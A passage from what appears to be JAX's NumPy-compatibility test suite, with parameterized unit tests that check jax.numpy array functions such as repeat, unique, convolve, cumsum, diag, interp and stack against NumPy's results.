for shape, dtype in _shape_and_dtypes(all_shapes, default_dtypes)
for axis in [None] + list(range(-len(shape), max(1, len(shape))))
for fixed_size in [True, False]))
def testRepeat(self, axis, shape, dtype, repeats, fixed_size):
rng = jtu.rand_default(self.rng())
np_fun = lambda arg: np.repeat(arg, repeats=repeats, axis=axis)
np_fun = _promote_like_jnp(np_fun)
if fixed_size:
total_repeat_length = np.repeat(np.zeros(shape), repeats, axis).shape[axis or 0]
jnp_fun = lambda arg, rep: jnp.repeat(arg, repeats=rep, axis=axis,
total_repeat_length=total_repeat_length)
jnp_args_maker = lambda: [rng(shape, dtype), repeats]
clo_fun = lambda arg: jnp.repeat(arg, repeats=repeats, axis=axis,
total_repeat_length=total_repeat_length)
clo_fun_args_maker = lambda: [rng(shape, dtype)]
self._CompileAndCheck(jnp_fun, jnp_args_maker)
self._CheckAgainstNumpy(np_fun, clo_fun, clo_fun_args_maker)
else:
# Now repeats is in a closure, so a constant.
jnp_fun = lambda arg: jnp.repeat(arg, repeats=repeats, axis=axis)
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
def testRepeatScalarFastPath(self):
a = jnp.array([1,2,3,4])
f = lambda a: jnp.repeat(a, repeats=2)
jaxpr = api.make_jaxpr(f)(a)
self.assertLessEqual(len(jaxpr.jaxpr.eqns), 6)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_axis={}_ind={}_inv={}_count={}".format(
jtu.format_shape_dtype_string(shape, dtype), axis,
return_index, return_inverse, return_counts),
"shape": shape, "dtype": dtype, "axis": axis,
"return_index": return_index, "return_inverse": return_inverse,
"return_counts": return_counts}
for dtype in number_dtypes
for shape in all_shapes
for axis in [None] + list(range(len(shape)))
for return_index in [False, True]
for return_inverse in [False, True]
for return_counts in [False, True]))
def testUnique(self, shape, dtype, axis, return_index, return_inverse, return_counts):
if axis is not None and numpy_version < (1, 19) and np.empty(shape).size == 0:
self.skipTest("zero-sized axis in unique leads to error in older numpy.")
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape, dtype)]
np_fun = lambda x: np.unique(x, return_index, return_inverse, return_counts, axis=axis)
jnp_fun = lambda x: jnp.unique(x, return_index, return_inverse, return_counts, axis=axis)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_size={}".format(
jtu.format_shape_dtype_string(shape, dtype), size),
"shape": shape, "dtype": dtype, "size": size}
for dtype in number_dtypes
for size in [1, 5, 10]
for shape in nonempty_array_shapes))
def testUniqueSize(self, shape, dtype, size):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape, dtype)]
kwds = dict(return_index=True, return_inverse=True, return_counts=True)
def np_fun(x):
u, ind, inv, counts = jnp.unique(x, **kwds)
if size <= len(u):
u, ind, counts = u[:size], ind[:size], counts[:size]
else:
extra = size - len(u)
u = np.concatenate([u, np.full(extra, u[0], u.dtype)])
ind = np.concatenate([ind, np.full(extra, ind[0], ind.dtype)])
counts = np.concatenate([counts, np.zeros(extra, counts.dtype)])
return u, ind, inv, counts
jnp_fun = lambda x: jnp.unique(x, size=size, **kwds)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_fixed_size={}".format(fixed_size),
"fixed_size": fixed_size}
for fixed_size in [True, False]))
def testNonScalarRepeats(self, fixed_size):
'''
Following numpy test suite from `test_repeat` at
https://github.com/numpy/numpy/blob/main/numpy/core/tests/test_multiarray.py
'''
tol = 1e-5
def test_single(m, args_maker, repeats, axis):
lax_ans = jnp.repeat(m, repeats, axis)
numpy_ans = np.repeat(m, repeats, axis)
self.assertAllClose(lax_ans, numpy_ans, rtol=tol, atol=tol)
if fixed_size:
# Calculate expected size of the repeated axis.
rep_length = np.repeat(np.zeros_like(m), repeats, axis).shape[axis or 0]
jnp_fun = lambda arg, rep: jnp.repeat(
arg, repeats=rep, axis=axis, total_repeat_length=rep_length)
else:
jnp_fun = lambda arg: jnp.repeat(arg, repeats = repeats, axis=axis)
self._CompileAndCheck(jnp_fun, args_maker)
m = jnp.array([1,2,3,4,5,6])
if fixed_size:
args_maker = lambda: [m, repeats]
else:
args_maker = lambda: [m]
for repeats in [2, jnp.array([1,3,0,1,1,2]), jnp.array([1,3,2,1,1,2]), jnp.array([2])]:
test_single(m, args_maker, repeats, axis=None)
test_single(m, args_maker, repeats, axis=0)
m_rect = m.reshape((2,3))
if fixed_size:
args_maker = lambda: [m_rect, repeats]
else:
args_maker = lambda: [m_rect]
for repeats in [2, jnp.array([2,1]), jnp.array([2])]:
test_single(m_rect, args_maker, repeats, axis=0)
for repeats in [2, jnp.array([1,3,2]), jnp.array([2])]:
test_single(m_rect, args_maker, repeats, axis=1)
def testIssue2330(self):
'''
Make sure return value of jnp.concatenate is a jax.ndarray and is side-effect save
'''
def attempt_sideeffect(x):
x = [x]
x = jnp.concatenate(x)
x -= 1.
return x
np_input = np.ones((1))
jnp_input = jnp.ones((1))
expected_np_input_after_call = np.ones((1))
expected_jnp_input_after_call = jnp.ones((1))
self.assertTrue(xla.type_is_device_array(jnp.concatenate([np_input])))
attempt_sideeffect(np_input)
attempt_sideeffect(jnp_input)
self.assertAllClose(np_input, expected_np_input_after_call)
self.assertAllClose(jnp_input, expected_jnp_input_after_call)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "op={}_xshape=[{}]_yshape=[{}]_mode={}".format(
op,
jtu.format_shape_dtype_string(xshape, dtype),
jtu.format_shape_dtype_string(yshape, dtype),
mode),
"xshape": xshape, "yshape": yshape, "dtype": dtype, "mode": mode,
"jnp_op": getattr(jnp, op),
"np_op": getattr(np, op)}
for mode in ['full', 'same', 'valid']
for op in ['convolve', 'correlate']
for dtype in number_dtypes
for xshape in one_dim_array_shapes
for yshape in one_dim_array_shapes))
def testConvolutions(self, xshape, yshape, dtype, mode, jnp_op, np_op):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(xshape, dtype), rng(yshape, dtype)]
precision = lax.Precision.HIGHEST if jtu.device_under_test() == "tpu" else None
np_fun = partial(np_op, mode=mode)
jnp_fun = partial(jnp_op, mode=mode, precision=precision)
tol = {np.float16: 2e-1, np.float32: 1e-2, np.float64: 1e-14,
np.complex128: 1e-14}
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False,
tol=tol)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "op={}_shape=[{}]_axis={}_out_dtype={}".format(
op, jtu.format_shape_dtype_string(shape, dtype), axis,
out_dtype.__name__),
"axis": axis, "shape": shape, "dtype": dtype, "out_dtype": out_dtype,
"jnp_op": getattr(jnp, op), "np_op": getattr(np, op)}
for op in ["cumsum", "cumprod"]
for dtype in all_dtypes
for out_dtype in default_dtypes
for shape in all_shapes
for axis in [None] + list(range(-len(shape), len(shape)))))
def testCumSumProd(self, axis, shape, dtype, out_dtype, np_op, jnp_op):
rng = jtu.rand_default(self.rng())
np_fun = lambda arg: np_op(arg, axis=axis, dtype=out_dtype)
np_fun = jtu.ignore_warning(category=np.ComplexWarning)(np_fun)
jnp_fun = lambda arg: jnp_op(arg, axis=axis, dtype=out_dtype)
jnp_fun = jtu.ignore_warning(category=jnp.ComplexWarning)(jnp_fun)
args_maker = lambda: [rng(shape, dtype)]
tol_thresholds = {dtypes.bfloat16: 4e-2}
tol = max(jtu.tolerance(dtype, tol_thresholds),
jtu.tolerance(out_dtype, tol_thresholds))
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
tol=tol)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "op={}_shape=[{}]_axis={}_out_dtype={}".format(
op, jtu.format_shape_dtype_string(shape, dtype), axis,
out_dtype.__name__),
"axis": axis, "shape": shape, "dtype": dtype, "out_dtype": out_dtype,
"jnp_op": getattr(jnp, op), "np_op": getattr(np, op)}
for op in ["nancumsum", "nancumprod"]
for dtype in all_dtypes
for out_dtype in default_dtypes
for shape in all_shapes
for axis in [None] + list(range(-len(shape), len(shape)))))
def testNanCumSumProd(self, axis, shape, dtype, out_dtype, np_op, jnp_op):
rng = jtu.rand_some_nan(self.rng())
np_fun = partial(np_op, axis=axis, dtype=out_dtype)
np_fun = jtu.ignore_warning(category=np.ComplexWarning)(np_fun)
jnp_fun = partial(jnp_op, axis=axis, dtype=out_dtype)
jnp_fun = jtu.ignore_warning(category=jnp.ComplexWarning)(jnp_fun)
args_maker = lambda: [rng(shape, dtype)]
tol_thresholds = {dtypes.bfloat16: 4e-2}
tol = max(jtu.tolerance(dtype, tol_thresholds),
jtu.tolerance(out_dtype, tol_thresholds))
if dtype != jnp.bfloat16:
# numpy functions do not properly handle bfloat16
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=True,
tol=tol)
self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=True)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_yshape={}_xshape={}_dx={}_axis={}".format(
jtu.format_shape_dtype_string(yshape, dtype),
jtu.format_shape_dtype_string(xshape, dtype) if xshape is not None else None,
dx, axis),
"yshape": yshape, "xshape": xshape, "dtype": dtype, "dx": dx, "axis": axis}
for dtype in default_dtypes
for yshape, xshape, dx, axis in [
((10,), None, 1.0, -1),
((3, 10), None, 2.0, -1),
((3, 10), None, 3.0, -0),
((10, 3), (10,), 1.0, -2),
((3, 10), (10,), 1.0, -1),
((3, 10), (3, 10), 1.0, -1),
((2, 3, 10), (3, 10), 1.0, -2),
]))
@jtu.skip_on_devices("tpu") # TODO(jakevdp): fix and reenable this test.
@jax.numpy_rank_promotion('allow') # This test explicitly exercises implicit rank promotion.
def testTrapz(self, yshape, xshape, dtype, dx, axis):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(yshape, dtype), rng(xshape, dtype) if xshape is not None else None]
np_fun = partial(np.trapz, dx=dx, axis=axis)
jnp_fun = partial(jnp.trapz, dx=dx, axis=axis)
tol = jtu.tolerance(dtype, {np.float64: 1e-12,
dtypes.bfloat16: 4e-2})
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, tol=tol,
check_dtypes=False)
self._CompileAndCheck(jnp_fun, args_maker, atol=tol, rtol=tol,
check_dtypes=False)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_dtype={}_m={}_n={}_k={}".format(
np.dtype(dtype).name, m, n, k),
"m": m, "n": n, "k": k, "dtype": dtype}
for dtype in default_dtypes
for n in [0, 4]
for m in [None, 0, 1, 3, 4]
for k in list(range(-4, 4))))
def testTri(self, m, n, k, dtype):
np_fun = lambda: np.tri(n, M=m, k=k, dtype=dtype)
jnp_fun = lambda: jnp.tri(n, M=m, k=k, dtype=dtype)
args_maker = lambda: []
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_op={}_shape={}_k={}".format(
op, jtu.format_shape_dtype_string(shape, dtype), k),
"dtype": dtype, "shape": shape, "op": op, "k": k}
for dtype in default_dtypes
for shape in [shape for shape in all_shapes if len(shape) >= 2]
for op in ["tril", "triu"]
for k in list(range(-3, 3))))
def testTriLU(self, dtype, shape, op, k):
rng = jtu.rand_default(self.rng())
np_fun = lambda arg: getattr(np, op)(arg, k=k)
jnp_fun = lambda arg: getattr(jnp, op)(arg, k=k)
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "n={}_k={}_m={}".format(n, k, m),
"n": n, "k": k, "m": m}
for n in range(1, 5)
for k in [-1, 0, 1]
for m in range(1, 5)))
def testTrilIndices(self, n, k, m):
np_fun = lambda n, k, m: np.tril_indices(n, k=k, m=m)
jnp_fun = lambda n, k, m: jnp.tril_indices(n, k=k, m=m)
args_maker = lambda: [n, k, m]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "n={}_k={}_m={}".format(n, k, m),
"n": n, "k": k, "m": m}
for n in range(1, 5)
for k in [-1, 0, 1]
for m in range(1, 5)))
def testTriuIndices(self, n, k, m):
np_fun = lambda n, k, m: np.triu_indices(n, k=k, m=m)
jnp_fun = lambda n, k, m: jnp.triu_indices(n, k=k, m=m)
args_maker = lambda: [n, k, m]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_k={}".format(
jtu.format_shape_dtype_string(shape, dtype), k),
"dtype": dtype, "shape": shape, "k": k}
for dtype in default_dtypes
for shape in [(1,1), (1,2), (2,2), (2,3), (3,2), (3,3), (4,4)]
for k in [-1, 0, 1]))
def testTriuIndicesFrom(self, shape, dtype, k):
rng = jtu.rand_default(self.rng())
np_fun = lambda arr, k: np.triu_indices_from(arr, k=k)
jnp_fun = lambda arr, k: jnp.triu_indices_from(arr, k=k)
args_maker = lambda: [rng(shape, dtype), k]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_k={}".format(
jtu.format_shape_dtype_string(shape, dtype), k),
"dtype": dtype, "shape": shape, "k": k}
for dtype in default_dtypes
for shape in [(1,1), (1,2), (2,2), (2,3), (3,2), (3,3), (4,4)]
for k in [-1, 0, 1]))
def testTrilIndicesFrom(self, shape, dtype, k):
rng = jtu.rand_default(self.rng())
np_fun = lambda arr, k: np.tril_indices_from(arr, k=k)
jnp_fun = lambda arr, k: jnp.tril_indices_from(arr, k=k)
args_maker = lambda: [rng(shape, dtype), k]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_ndim={}_n={}".format(ndim, n),
"ndim": ndim, "n": n}
for ndim in [0, 1, 4]
for n in [0, 1, 7]))
def testDiagIndices(self, ndim, n):
np.testing.assert_equal(np.diag_indices(n, ndim),
jnp.diag_indices(n, ndim))
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "arr_shape={}".format(
jtu.format_shape_dtype_string(shape, dtype)
),
"dtype": dtype, "shape": shape}
for dtype in default_dtypes
for shape in [(1,1), (2,2), (3,3), (4,4), (5,5)]))
def testDiagIndicesFrom(self, dtype, shape):
rng = jtu.rand_default(self.rng())
np_fun = np.diag_indices_from
jnp_fun = jnp.diag_indices_from
args_maker = lambda : [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_k={}".format(
jtu.format_shape_dtype_string(shape, dtype), k),
"dtype": dtype, "shape": shape, "k": k}
for dtype in default_dtypes
for shape in [shape for shape in all_shapes if len(shape) in (1, 2)]
for k in list(range(-4, 4))))
def testDiag(self, shape, dtype, k):
rng = jtu.rand_default(self.rng())
np_fun = lambda arg: np.diag(arg, k)
jnp_fun = lambda arg: jnp.diag(arg, k)
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_k={}".format(
jtu.format_shape_dtype_string(shape, dtype), k),
"dtype": dtype, "shape": shape, "k": k}
for dtype in default_dtypes
for shape in all_shapes
for k in range(-4, 4)))
def testDiagFlat(self, shape, dtype, k):
rng = jtu.rand_default(self.rng())
# numpy has inconsistencies for scalar values
# https://github.com/numpy/numpy/issues/16477
# jax differs in that it treats scalars values as length-1 arrays
np_fun = lambda arg: np.diagflat(np.atleast_1d(arg), k)
jnp_fun = lambda arg: jnp.diagflat(arg, k)
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=True)
self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=True)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_a1_shape={}_a2_shape2={}".format(
jtu.format_shape_dtype_string(a1_shape, dtype),
jtu.format_shape_dtype_string(a2_shape, dtype)),
"dtype": dtype, "a1_shape": a1_shape, "a2_shape": a2_shape}
for dtype in default_dtypes
for a1_shape in one_dim_array_shapes
for a2_shape in one_dim_array_shapes))
def testPolyMul(self, a1_shape, a2_shape, dtype):
rng = jtu.rand_default(self.rng())
np_fun = lambda arg1, arg2: np.polymul(arg1, arg2)
jnp_fun_np = lambda arg1, arg2: jnp.polymul(arg1, arg2, trim_leading_zeros=True)
jnp_fun_co = lambda arg1, arg2: jnp.polymul(arg1, arg2)
args_maker = lambda: [rng(a1_shape, dtype), rng(a2_shape, dtype)]
tol = {np.float16: 2e-1, np.float32: 5e-2, np.float64: 1e-13}
self._CheckAgainstNumpy(np_fun, jnp_fun_np, args_maker, check_dtypes=False, tol=tol)
self._CompileAndCheck(jnp_fun_co, args_maker, check_dtypes=False)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_offset={}_axis1={}_axis2={}".format(
jtu.format_shape_dtype_string(shape, dtype), offset, axis1, axis2),
"dtype": dtype, "shape": shape, "offset": offset, "axis1": axis1,
"axis2": axis2}
for dtype in default_dtypes
for shape in [shape for shape in all_shapes if len(shape) >= 2]
for axis1 in range(-len(shape), len(shape))
for axis2 in [a for a in range(-len(shape), len(shape))
if a % len(shape) != axis1 % len(shape)]
for offset in list(range(-4, 4))))
def testDiagonal(self, shape, dtype, offset, axis1, axis2):
rng = jtu.rand_default(self.rng())
np_fun = lambda arg: np.diagonal(arg, offset, axis1, axis2)
jnp_fun = lambda arg: jnp.diagonal(arg, offset, axis1, axis2)
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_n={}".format(np.dtype(dtype).name, n),
"dtype": dtype, "n": n}
for dtype in default_dtypes
for n in list(range(4))))
def testIdentity(self, n, dtype):
np_fun = lambda: np.identity(n, dtype)
jnp_fun = lambda: jnp.identity(n, dtype)
args_maker = lambda: []
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_period={}_left={}_right={}".format(
jtu.format_shape_dtype_string(shape, dtype), period, left, right),
"shape": shape, "dtype": dtype,
"period": period, "left": left, "right": right}
for shape in nonempty_shapes
for period in [None, 0.59]
for left in [None, 0]
for right in [None, 1]
for dtype in default_dtypes
# following types lack precision for meaningful tests
if dtype not in [np.int8, np.int16, np.float16, jnp.bfloat16]
))
def testInterp(self, shape, dtype, period, left, right):
rng = jtu.rand_default(self.rng(), scale=10)
kwds = dict(period=period, left=left, right=right)
np_fun = partial(np.interp, **kwds)
jnp_fun = partial(jnp.interp, **kwds)
args_maker = lambda: [rng(shape, dtype), np.sort(rng((20,), dtype)), np.linspace(0, 1, 20)]
# skip numpy comparison for integer types with period specified, because numpy
# uses an unstable sort and so results differ for duplicate values.
if not (period and np.issubdtype(dtype, np.integer)):
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, tol={np.float32: 2E-4})
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_x1={}_x2={}_x1_rng={}".format(
jtu.format_shape_dtype_string(x1_shape, x1_dtype),
jtu.format_shape_dtype_string(x2_shape, np.int32),
x1_rng_factory_id),
"x1_shape": x1_shape, "x1_dtype": x1_dtype,
"x2_shape": x2_shape, "x1_rng_factory": x1_rng_factory,
"x2_rng_factory": x2_rng_factory}
for x1_rng_factory_id, x1_rng_factory in
enumerate([jtu.rand_some_inf_and_nan, jtu.rand_some_zero])
for x2_rng_factory in [partial(jtu.rand_int, low=-1075, high=1024)]
for x1_shape, x2_shape in filter(_shapes_are_broadcast_compatible,
itertools.combinations_with_replacement(array_shapes, 2))
for x1_dtype in default_dtypes))
@jax.numpy_rank_promotion('allow') # This test explicitly exercises implicit rank promotion.
def testLdexp(self, x1_shape, x1_dtype, x2_shape, x1_rng_factory, x2_rng_factory):
# integer types are converted to float64 in numpy's implementation
if (x1_dtype not in [jnp.bfloat16, np.float16, np.float32]
and not config.x64_enabled):
self.skipTest("Only run float64 testcase when float64 is enabled.")
x1_rng = x1_rng_factory(self.rng())
x2_rng = x2_rng_factory(self.rng())
np_fun = lambda x1, x2: np.ldexp(x1, x2)
np_fun = jtu.ignore_warning(category=RuntimeWarning,
message="overflow.*")(np_fun)
jnp_fun = lambda x1, x2: jnp.ldexp(x1, x2)
args_maker = lambda: [x1_rng(x1_shape, x1_dtype),
x2_rng(x2_shape, np.int32)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_x={}_rng_factory={}".format(
jtu.format_shape_dtype_string(shape, dtype), rng_factory_id),
"shape": shape, "dtype": dtype, "rng_factory": rng_factory}
for rng_factory_id, rng_factory in enumerate([
jtu.rand_some_inf_and_nan,
jtu.rand_some_zero,
partial(jtu.rand_not_small, offset=1e8),
])
for shape in all_shapes
for dtype in default_dtypes))
def testFrexp(self, shape, dtype, rng_factory):
# integer types are converted to float64 in numpy's implementation
if (dtype not in [jnp.bfloat16, np.float16, np.float32]
and not config.x64_enabled):
self.skipTest("Only run float64 testcase when float64 is enabled.")
rng = rng_factory(self.rng())
np_fun = lambda x: np.frexp(x)
jnp_fun = lambda x: jnp.frexp(x)
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
check_dtypes=np.issubdtype(dtype, np.inexact))
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_dtype_{}_offset={}_axis1={}_axis2={}".format(
jtu.format_shape_dtype_string(shape, dtype),
out_dtype, offset, axis1, axis2),
"dtype": dtype, "out_dtype": out_dtype, "shape": shape, "offset": offset,
"axis1": axis1, "axis2": axis2}
for dtype in default_dtypes
for out_dtype in [None] + number_dtypes
for shape in [shape for shape in all_shapes if len(shape) >= 2]
for axis1 in range(-len(shape), len(shape))
for axis2 in range(-len(shape), len(shape))
if (axis1 % len(shape)) != (axis2 % len(shape))
for offset in list(range(-4, 4))))
def testTrace(self, shape, dtype, out_dtype, offset, axis1, axis2):
rng = jtu.rand_default(self.rng())
def np_fun(arg):
if out_dtype == jnp.bfloat16:
return np.trace(arg, offset, axis1, axis2, np.float32).astype(jnp.bfloat16)
else:
return np.trace(arg, offset, axis1, axis2, out_dtype)
jnp_fun = lambda arg: jnp.trace(arg, offset, axis1, axis2, out_dtype)
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_a={}_v={}_side={}".format(
jtu.format_shape_dtype_string(ashape, dtype),
jtu.format_shape_dtype_string(vshape, dtype),
side), "ashape": ashape, "vshape": vshape, "side": side,
"dtype": dtype}
for ashape in [(15,), (16,), (17,)]
for vshape in [(), (5,), (5, 5)]
for side in ['left', 'right']
for dtype in default_dtypes
))
def testSearchsorted(self, ashape, vshape, side, dtype):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [np.sort(rng(ashape, dtype)), rng(vshape, dtype)]
np_fun = lambda a, v: np.searchsorted(a, v, side=side)
jnp_fun = lambda a, v: jnp.searchsorted(a, v, side=side)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_x={}_bins={}_right={}_reverse={}".format(
jtu.format_shape_dtype_string(xshape, dtype),
jtu.format_shape_dtype_string(binshape, dtype),
right, reverse), "xshape": xshape, "binshape": binshape,
"right": right, "reverse": reverse, "dtype": dtype}
for xshape in [(20,), (5, 4)]
for binshape in [(1,), (5,)]
for right in [True, False]
for reverse in [True, False]
for dtype in default_dtypes
))
def testDigitize(self, xshape, binshape, right, reverse, dtype):
order = jax.ops.index[::-1] if reverse else jax.ops.index[:]
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(xshape, dtype), jnp.sort(rng(binshape, dtype))[order]]
np_fun = lambda x, bins: np.digitize(x, bins, right=right)
jnp_fun = lambda x, bins: jnp.digitize(x, bins, right=right)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_array={}".format(
jtu.format_test_name_suffix("", [shape] * len(dtypes), dtypes), array_input),
"shape": shape, "dtypes": dtypes, "array_input": array_input}
for dtypes in [
[np.float32],
[np.float32, np.float32],
[np.float32, np.int32, np.float32],
[np.float32, np.int64, np.float32],
[np.float32, np.int32, np.float64],
]
for shape in [(), (2,), (3, 4), (1, 5)]
for array_input in [True, False]))
def testColumnStack(self, shape, dtypes, array_input):
rng = jtu.rand_default(self.rng())
if array_input:
args_maker = lambda: [np.array([rng(shape, dtype) for dtype in dtypes])]
else:
args_maker = lambda: [[rng(shape, dtype) for dtype in dtypes]]
np_fun = _promote_like_jnp(np.column_stack)
jnp_fun = jnp.column_stack
self._CheckAgainstNumpy(jnp_fun, np_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_axis={}_array={}".format(
jtu.format_test_name_suffix("", [shape] * len(dtypes), dtypes), axis, array_input),
"shape": shape, "axis": axis, "dtypes": dtypes, "array_input": array_input}
for dtypes in [
[np.float32],
[np.float32, np.float32],
[np.float32, np.int32, np.float32],
[np.float32, np.int64, np.float32],
[np.float32, np.int32, np.float64],
]
for shape in [(), (2,), (3, 4), (1, 100)]
for axis in range(-len(shape), len(shape) + 1)
for array_input in [True, False]))
def testStack(self, shape, axis, dtypes, array_input):
rng = jtu.rand_default(self.rng())
if array_input:
args_maker = lambda: [np.array([rng(shape, dtype) for dtype in dtypes])]
else:
args_maker = lambda: [[rng(shape, dtype) for dtype in dtypes]]
np_fun = _promote_like_jnp(partial(np.stack, axis=axis))
jnp_fun = partial(jnp.stack, axis=axis)
self._CheckAgainstNumpy(jnp_fun, np_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_op={}_{}_array={}".format(
op, jtu.format_test_name_suffix("", [shape] * len(dtypes), dtypes), array_input),
"shape": shape, "op": op, "dtypes": dtypes, "array_input": array_input}
for op in ["hstack", "vstack", "dstack"]
for dtypes in [
[np.float32],
[np.float32, np.float32],
[np.float32, np.int32, np.float32],
[np.float32, np.int64, np.float32],
[np.float32, np.int32, np.float64],
]
for shape in [(), (2,), (3, 4), (1, 100), (2, 3, 4)]
for array_input in [True, False]))
def testHVDStack(self, shape, op, dtypes, array_input):
rng = jtu.rand_default(self.rng())
if array_input:
args_maker = lambda: [np.array([rng(shape, dtype) for dtype in dtypes])]
else:
args_maker = lambda: [[rng(shape, dtype) for dtype in dtypes]]
np_fun = _promote_like_jnp(getattr(np, op))
jnp_fun = getattr(jnp, op)
self._CheckAgainstNumpy(jnp_fun, np_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_inshape={}_outdtype={}_fillshape={}".format(
jtu.format_shape_dtype_string(shape, fill_value_dtype),
np.dtype(out_dtype).name if out_dtype else "None",
fill_value_shape),
"fill_value_dtype": fill_value_dtype, "fill_value_shape": fill_value_shape,
"shape": shape, "out_dtype": out_dtype}
for shape in array_shapes + [3, np.array(7, dtype=np.int32)]
for fill_value_dtype in default_dtypes
for fill_value_shape in _compatible_shapes(shape)
for out_dtype in [None] + default_dtypes))
def testFull(self, shape, fill_value_dtype, fill_value_shape, out_dtype):
rng = jtu.rand_default(self.rng())
np_fun = lambda fill_value: np.full(shape, fill_value, dtype=out_dtype)
jnp_fun = lambda fill_value: jnp.full(shape, fill_value, dtype=out_dtype)
args_maker = lambda: [rng(fill_value_shape, fill_value_dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.named_cases_from_sampler(lambda s: ({
"testcase_name": "_shape={}_n={}_axis={}_prepend={}_append={}".format(
jtu.format_shape_dtype_string(shape, dtype),
n, axis, prepend, append),
"shape": shape, "dtype": dtype, "n": n, "axis": axis,
"prepend": prepend, "append": append
} for shape, dtype in s(_shape_and_dtypes(nonempty_nonscalar_array_shapes, default_dtypes))
for n in s([0, 1, 2])
for axis in s(list(range(-len(shape), max(1, len(shape)))))
for prepend in s([None, 1, np.zeros(shape, dtype=dtype)])
for append in s([None, 1, np.zeros(shape, dtype=dtype)])
)))
def testDiff(self, shape, dtype, n, axis, prepend, append):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape, dtype)]
def np_fun(x, n=n, axis=axis, prepend=prepend, append=append):
if prepend is None:
prepend = np._NoValue
